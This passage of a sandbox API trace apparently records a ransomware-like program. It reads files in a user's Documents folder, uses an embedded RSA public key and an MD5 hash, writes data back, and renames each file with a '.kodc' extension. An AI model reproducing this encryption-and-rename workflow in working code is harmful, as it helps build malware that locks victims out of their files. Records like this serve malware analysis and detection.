dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.846] GetCurrentThreadId () returned 0x42c [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8f988 [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.846] GetCurrentThreadId () returned 0x42c [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac10 [0098.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac28 [0098.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abf8 [0098.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ac40 [0098.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0098.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac10 | out: hHeap=0x630000) returned 1 [0098.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac10 [0098.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0098.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0098.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac10 | out: hHeap=0x630000) returned 1 [0098.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac40 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac28 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abf8 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abe0 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d768 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.849] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0xa063, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xa063, lpOverlapped=0x0) returned 1 [0098.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.850] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa068, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.850] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0098.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0098.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.850] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.850] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.850] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.850] CloseHandle (hObject=0x5cc) returned 1 [0098.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.856] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6TvOU93J WY9K-S_.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6tvou93j wy9k-s_.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6TvOU93J WY9K-S_.pptx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6tvou93j wy9k-s_.pptx.kodc")) returned 1 [0098.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.856] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.858] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf33083b0, ftCreationTime.dwHighDateTime=0x1d5c1d7, ftLastAccessTime.dwLowDateTime=0x6f7246e0, ftLastAccessTime.dwHighDateTime=0x1d5c447, ftLastWriteTime.dwLowDateTime=0x6f7246e0, ftLastWriteTime.dwHighDateTime=0x1d5c447, nFileSizeHigh=0x0, nFileSizeLow=0xff65, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xJ2wy0-YqW7HZJEM29.rtf", cAlternateFileName="XJ2WY0~1.RTF")) returned 1 [0098.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.858] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xJ2wy0-YqW7HZJEM29.rtf") returned=".rtf" [0098.858] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xJ2wy0-YqW7HZJEM29.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xj2wy0-yqw7hzjem29.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.858] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=65381) returned 1 [0098.858] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.860] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xff3f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.860] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.861] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.861] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xff65, lpOverlapped=0x0) returned 1 [0098.862] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.862] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.862] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.862] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.863] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.863] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.863] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.863] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.863] GetLastError () returned 0x0 [0098.863] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.863] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.863] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.863] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.863] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xff70) returned 0x9ba4d90 [0098.863] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d768 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abe0 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d7b0 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abf8 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac28 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac40 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.864] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac28 | out: hHeap=0x630000) returned 1 [0098.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac40 | out: hHeap=0x630000) returned 1 [0098.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ac40 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ac28 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.864] RtlAllocateHeap (HeapHandle=0x630000, 